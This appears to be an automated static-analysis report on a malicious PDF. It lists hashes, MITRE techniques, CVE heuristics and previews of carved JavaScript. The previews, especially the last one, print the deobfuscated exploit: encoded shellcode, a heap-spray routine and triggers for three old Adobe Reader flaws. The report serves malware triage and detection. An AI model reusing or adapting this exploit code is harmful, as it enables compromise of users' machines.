Malicious PDF — malware analysis report

Static analysis result for SHA-256 7a687499a38129cc…

MALICIOUS

PDF

6.7 KB
MD5: 8fbce27af4f33f037f668fa6493decf9 SHA-1: 1e5258957dd98119725cebc75ae6ce1cf1a7f7b3 SHA-256: 7a687499a38129cc8f2aa43d59edafc3538787cbc34b67c6e1185fe0659061e9
476 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF sample contains embedded JavaScript that leverages multiple CVEs (CVE-2007-5659, CVE-2009-0927, CVE-2009-4324) to achieve code execution. The deobfuscated JavaScript indicates it is designed to download and execute a second-stage payload, as evidenced by the 'SHELLCODE' variable and calls to 'NEWPLAYER'. The ClamAV detection 'Js.Exploit.Shellcode-18' further supports this malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0039_000.js
1172685c6d0ed7667f0631a8616348ad780a0edc72bc3a46c04e457cfc6f4790		 pdf-javascript-stream PDF /JS object 39 at offset 0x16F 20196 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
k130lcZ="y5h9o09lD=[70,85,78,67,84,73,79,78,0,70,73,88,127,73,84,8,89,65,82,8"; k130lcZ+= "3,80,12,76,69,78,9,91,87,72,73,76,69,8,89,65,82,83,80,14,"; k130lcZ+= "76,69,78,71,84,72,10,18,28,76,69,78,9,91,89,65,82,83,80,1"; k130lcZ+= "1,29,89,65,82,83,80,27,93,89,65,82,83,80,29,89,65,82,83,8"; k130lcZ+= "0,14,83,85,66,83,84,82,73,78,71,8,16,12,76,69,78,15,18,9,"; k130lcZ+= "27,82,69,84,85,82,78,0,89,65,82,83,80,27,93,45,42,70,85,7"; k130lcZ+= "8,67,84,73,79,78,0,78,69,87,80,76,65,89,69,82,8,9,91,45,4"; k130lcZ+= "2,86,65,82,0,83,72,69,76,76,67,79,68,69,0,29,0,85,78,69,8"; k130lcZ+= "3,67,65,80,69,8,2,5,85,17,17,101,98,5,85,20,98,21,98,5,85"; k130lcZ+= ",99,25,19,19,5,85,24,17,22,22,5,85,97,102,99,25,5,85,24,1"; k130lcZ+= "6,16,17,5,85,16,98,19,20,5,85,101,18,97,22,5,85,101,98,10"; k130lcZ+= "2,97,5,85,101,24,16,21,5,85,102,102,101,97,5,85,102,102,1"; k130lcZ+= "02,102,5,85,23,99,20,102,5,85,97,22,97,22,5,85,102,25,97,"; k130lcZ+= "22,5,85,16,23,99,18,5,85,97,22,25,22,5,85,97,22,97,22,5,8"; k130lcZ+= "5,101,22,18,100,5,85,18,100,97,97,5,85,98,97,100,22,5,85,"; k130lcZ+= "18,100,16,98,5,85,97,101,99,101,5,85,100,22,18,100,5,85,1"; k130lcZ+= "8,100,24,22,5,85,18,22,97,22,5,85,99,100,25,24,5,85,21,21"; k130lcZ+= ",100,19,5,85,101,16,101,16,5,85,25,24,18,22,5,85,100,19,9"; k130lcZ+= "9,19,5,85,101,16,20,97,5,85,18,22,101,16,5,85,100,20,25,2"; k130lcZ+= "4,5,85,21,17,100,19,5,85,101,16,101,16,5,85,25,24,18,22,5"; k130lcZ+= ",85,100,19,99,24,5,85,18,100,21,22,5,85,99,99,21,17,5,85,"; k130lcZ+= "102,102,97,21,5,85,102,100,20,101,5,85,97,22,97,22,5,85,2"; k130lcZ+= "0,20,97,22,5,85,99,101,21,102,5,85,99,24,99,25,5,85,97,22"; k130lcZ+= ",97,22,5,85,100,19,99,101,5,85,99,97,100,20,5,85,102,18,9"; k130lcZ+= "9,98,5,85,98,16,21,25,5,85,20,101,18,100,5,85,101,19,20,1"; k130lcZ+= "01,5,85,97,22,97,22,5,85,99,101,97,22,5,85,25,21,99,97,5,"; k130lcZ+= "85,97,22,25,20,5,85,100,21,99,101,5,85,99,19,99,101,5,85,"; k130lcZ+= "102,18,99,97,5,85,98,16,21,25,5,85,20,101,18,100,5,85,25,"; k130lcZ+= "23,20,101,5,85,97,22,97,22,5,85,18,21,97,22,5,85,101,22,2"; k130lcZ+= "0,97,5,85,23,97,18,100,5,85,99,99,102,21,5,85,21,25,101,2"; k130lcZ+= "2,5,85,97,18,102,16,5,85,97,18,22,17,5,85,99,23,97,21,5,8"; k130lcZ+= "5,99,19,24,24,5,85,99,16,100,101,5,85,101,18,22,17,5,85,9"; k130lcZ+= "7,18,97,21,5,85,97,22,99,19,5,85,22,22,25,21,5,85,102,22,"; k130lcZ+= "102,22,5,85,102,17,102,21,5,85,21,25,102,22,5,85,97,97,10"; k130lcZ+= "2,16,5,85,23,97,18,100,5,85,102,22,102,22,5,85,102,21,102"; k130lcZ+= ",22,5,85,102,22,102,22,5,85,102,16,21,25,5,85,21,25,98,22"; k130lcZ+= ",5,85,97,101,102,16,5,85,102,16,102,23,5,85,100,19,18,100"; k130lcZ+= ",5,85,18,100,25,97,5,85,24,24,100,18,5,85,97,21,100,101,5"; k130lcZ+= ",85,102,16,21,19,5,85,100,16,18,100,5,85,97,21,24,22,5,85"; k130lcZ+= ",25,21,21,19,5,85,101,102,22,102,5,85,16,98,101,23,5,85,2"; k130lcZ+= "2,19,97,21,5,85,23,100,25,21,5,85,17,24,97,25,5,85,25,99,"; k130lcZ+= "98,22,5,85,100,18,23,16,5,85,22,23,97,101,5,85,97,98,22,1"; k130lcZ+= "00,5,85,23,99,97,21,5,85,20,100,101,22,5,85,25,100,21,23,"; k130lcZ+= "5,85,100,19,98,25,5,85,102,24,20,17,5,85,102,24,18,100,5,"; k130lcZ+= "85,97,21,24,18,5,85,99,16,23,98,5,85,97,97,18,100,5,85,18"; k130lcZ+= ",100,101,100,5,85,98,97,102,24,5,85,23,98,97,21,5,85,97,1"; k130lcZ+= "8,18,100,5,85,97,21,18,100,5,85,16,100,22,19,5,85,102,102"; k130lcZ+= ",102,24,5,85,20,101,22,21,5,85,21,25,24,23,5,85,21,25,21,"; k130lcZ+= "25,5,85,101,24,18,24,5,85,20,97,97,24,5,85,22,99,25,21,5,"; k130lcZ+= "85,102,100,18,99,5,85,23,101,100,24,5,85,100,21,20,20,5,8"; k130lcZ+= "5,98,99,25,16,5,85,100,22,24,25,5,85,17,100,102,24,5,85,9"; k130lcZ+= "8,100,20,23,5,85,100,18,99,101,5,85,100,22,100,18,5,85,24"; k130lcZ+= ",25,25,99,5,85,100,23,24,25,5,85,100,21,100,22,5,85,25,20"; k130lcZ+= ",99,100,5,85,100,20,24,24,5,85,24,25,100,19,5,85,99,23,99"; k130lcZ+= ",101,5,85,100,102,100,22,5,85,99,101,25,16,5,85,99,97,24,"; k130lcZ+= "25,5,85,99,102,100,19,5,85,99,16,99,18,5,85,100,21,99,20,"; k130lcZ+= "5,85,100,101,99,24,5,85,100,22,24,24,5,85,100,22,99,101,5"; k130lcZ+= ",85,100,21,25,25,5,85,99,97,1
... (truncated)
legacy_pdfkit_stage_000.js
1498a25280444fc9e04889a0622422b714ff4dc559d344fcc836b48a36a0ed2e		 deobfuscated-js numeric array XOR decoded JavaScript at offset 0x16F 5344 bytes
Preview script
First 1,000 lines of the extracted script
FUNCTION FIX IT YARSP LEN	[WHILE YARSP LENGTH
  LEN	[YARSP  YARSP ]YARSP YARSP SUBSTRING   LEN  	 RETURN YARSP ]-*FUNCTION NEWPLAYER 	[-*VAR SHELLCODE   UNESCAPE   U  eb U b b Uc    U     Uafc  U     U b   Ue a  Uebfa Ue    Uffea Uffff U c f Ua a  Uf a  U  c  Ua    Ua a  Ue  d U daa Ubad  U d b Uaece Ud  d U d   U  a  Ucd   U  d  Ue e  U     Ud c  Ue  a U  e  Ud    U  d  Ue e  U     Ud c  U d   Ucc   Uffa  Ufd e Ua a  U  a  Uce f Uc c  Ua a  Ud ce Ucad  Uf cb Ub    U e d Ue  e Ua a  Ucea  U  ca Ua    Ud ce Uc ce Uf ca Ub    U e d U   e Ua a  U  a  Ue  a U a d Uccf  U  e  Ua f  Ua    Uc a  Uc    Uc de Ue    Ua a  Ua c  U     Uf f  Uf f  U  f  Uaaf  U a d Uf f  Uf f  Uf f  Uf    U  b  Uaef  Uf f  Ud  d U d a U  d  Ua de Uf    Ud  d Ua    U     Uef f U be  U  a  U d   U  a  U cb  Ud    U  ae Uab d U ca  U de  U d   Ud b  Uf    Uf  d Ua    Uc  b Uaa d U ded Ubaf  U ba  Ua  d Ua  d U d   Ufff  U e   U     U     Ue    U aa  U c   Ufd c U ed  Ud    Ubc   Ud    U df  Ubd   Ud ce Ud d  U   c Ud    Ud d  U  cd Ud    U  d  Uc ce Udfd  Uce   Uca   Ucfd  Uc c  Ud c  Udec  Ud    Ud ce Ud    Ucad  Ud  b Uc c  Uc f  Ud c  Ucaf  Udfc  Ud c  Uc    U bce U  a  	 -*VAR BLOCK   UNESCAPE   U C C U C C 	 -*VAR gdAGAcUYnFrsfZAszlo   UNESCAPE   U C C U C C U C C U C C U C C U C C U C C U C C U   E U     U     U   F U A E U D   U B   U B   U     U D   U     U   B U     U   A U   F U A E U   E U A D U     U     U     U     U     U     U C   U   D U     U     	 -*WHILE BLOCK LENGTH         	 BLOCK  BLOCK -*BLOCK BLOCK SUBSTRING         
 SHELLCODE LENGTH	 -*MEMORY NEW aRRAY 	 FOR I   I  X     I  	 [MEMORY{I}  BLOCK   SHELLCODE ]-*UTIL PRINTD  RLPpPJtxxiNCuHWAGcZCUhFMKZoBbszdgnDc   NEW dATE 		 -*UTIL PRINTD  sOTsXnqVmQknJjKixIOkLMFzyFMIpgGgnnkN   NEW dATE 		 -*TRY [THIS MEDIA NEWpLAYER NULL	 ] CATCH E	 []-*UTIL PRINTD gdAGAcUYnFrsfZAszlo  NEW dATE 		 ]-*-*FUNCTION COLLAB EMAIL 	[VAR SHELLCODE UNESCAPE   U  eb U b b Uc    U     Uafc  U     U b   Ue a  Uebfa Ue    Uffea Uffff U c f Ua a  Uf a  U  c  Ua    Ua a  Ue  d U daa Ubad  U d b Uaece Ud  d U d   U  a  Ucd   U  d  Ue e  U     Ud c  Ue  a U  e  Ud    U  d  Ue e  U     Ud c  U d   Ucc   Uffa  Ufd e Ua a  U  a  Uce f Uc c  Ua a  Ud ce Ucad  Uf cb Ub    U e d Ue  e Ua a  Ucea  U  ca Ua    Ud ce Uc ce Uf ca Ub    U e d U   e Ua a  U  a  Ue  a U a d Uccf  U  e  Ua f  Ua    Uc a  Uc    Uc de Ue    Ua a  Ua c  U     Uf f  Uf f  U  f  Uaaf  U a d Uf f  Uf f  Uf f  Uf    U  b  Uaef  Uf f  Ud  d U d a U  d  Ua de Uf    Ud  d Ua    U     Uef f U be  U  a  U d   U  a  U cb  Ud    U  ae Uab d U ca  U de  U d   Ud b  Uf    Uf  d Ua    Uc  b Uaa d U ded Ubaf  U ba  Ua  d Ua  d U d   Ufff  U e   U     U     Ue    U aa  U c   Ufd c U ed  Ud    Ubc   Ud    U df  Ubd   Ud ce Ud d  U   c Ud    Ud d  U  cd Ud    U  d  Uc ce Udfd  Uce   Uca   Ucfd  Uc c  Ud c  Udec  Ud    Ud ce Ud    Ucad  Ud  b Uc c  Uc f  Uc cb Ucacf Uc    U bce U  a  	 VAR MEM ARRAY NEW aRRAY 	 VAR CC  X C C C C VAR ADDR  X       VAR SC LEN SHELLCODE LENGTH
  VAR LEN ADDR
 SC LEN  X  	 VAR YARSP UNESCAPE   U     U     	 YARSP FIX IT YARSP LEN	 VAR COUNT   CC
 X      	 ADDR FOR VAR COUNT   COUNT COUNT  COUNT  	[MEM ARRAY{COUNT} YARSP SHELLCODE ]-*VAR OVERFLOW UNESCAPE   U C C U C C 	 WHILE OVERFLOW LENGTH      	[OVERFLOW  OVERFLOW ]-*THIS COLLABsTORE cOLLAB COLLECTeMAILiNFO [SUBJ    MSG OVERFLOW]	 ]-*-*FUNCTION COLLAB GETICON 	[IF APP DOC cOLLAB GETiCON	[VAR ARRY NEW aRRAY 	 VAR VVPETHYA UNESCAPE   U  eb U b b Uc    U     Uafc  U     U b   Ue a  Uebfa Ue    Uffea Uffff U c f Ua a  Uf a  U  c  Ua    Ua a  Ue  d U daa Ubad  U d b Uaece Ud  d U d   U  a  Ucd   U  d  Ue e  U     Ud c  Ue  a U  e  Ud    U  d  Ue e  U     Ud c  U d   Ucc   Uffa  Ufd e Ua a  U  a  Uce f Uc c  Ua a  Ud ce Ucad  Uf cb Ub    U e d Ue  e Ua a  Ucea  U  ca Ua    Ud ce Uc ce Uf ca Ub    U e d U   e Ua a  U  a  Ue  a U a d Uccf  U  e  Ua f  Ua    Uc a  Uc    Uc de Ue    Ua a  Ua c  U     Uf f  Uf f  U  f  Uaaf  U a d Uf f  Uf f  Uf f  Uf    U  b  Uaef  Uf f  Ud  d U d a U  d  Ua de Uf    Ud  d Ua    U     Uef f U be  U  a  U d   U  a  U cb  Ud    U  ae Uab d U ca  U de  U d   Ud 
... (truncated)
legacy_pdfkit_stage_001.js
5b9713b24ca2f3ad63839b771c3e3c53bdc066d7fc4958eaf906da5deae096f6		 deobfuscated-js numPages XOR decoded JavaScript at offset 0x16F 5344 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 9 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;}
function newplayer(){
var shellcode = unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD789%uD5D6%u94CD%uD488%u89D3%uC7CE%uDFD6%uCE90%uCA89%uCFD3%uC0C2%uD5C4%uDEC8%uD688%uD6CE%uD599%uCAD6%uD69B%uC0C2%uC8F9%uD1C3%uCAF6%uDFC7%uD4C3%uC080%u9BCE%u00A6");
var block = unescape("%u0c0c%u0c0c");
var GDagaCuyNfRSFzaSZLO = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u514e%u4865%u4844%u724f%u4a6e%u6d43%u4b51%u4b79%u7156%u4d41%u5944%u596b%u7979%u625a%u626f%u7a6e%u634e%u4a4d%u6341%u6253%u4154%u5670%u5543%u4273%u4c51%u576d%u5772%u5670");
while(block.length <= 32768) block+=block;
block=block.substring(0,32768 - shellcode.length);
memory=new Array();for(i=0;i<0x2000;i++) {memory[i]= block + shellcode;}
util.printd("rlpPpjTXXIncUhwagCzcuHfmkzObBSZDGNdC", new Date());
util.printd("SotSxNQvMqKNjJkIXioKlmfZYfmiPGgGNNKn", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(GDagaCuyNfRSFzaSZLO, new Date());}

function collab_email(){var shellcode=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD789%uD5D6%u94CD%uD488%u89D3%uC7CE%uDFD6%uCE90%uCA89%uCFD3%uC0C2%uD5C4%uDEC8%uD688%uD6CE%uD599%uCAD6%uD69B%uC0C2%uC3F9%uC7CB%uCACF%uC080%u9BCE%u00A6");var mem_array=new Array();var cc=0x0c0c0c0c;var addr=0x400000;var sc_len=shellcode.length*2;var len=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var count2=(cc-0x400000)/addr;for(var count=0;count<count2;count++){mem_array[count]=yarsp+shellcode;}
var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}

function collab_geticon(){if(app.doc.Collab.getIcon){var arry=new Array();var vvpethya=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.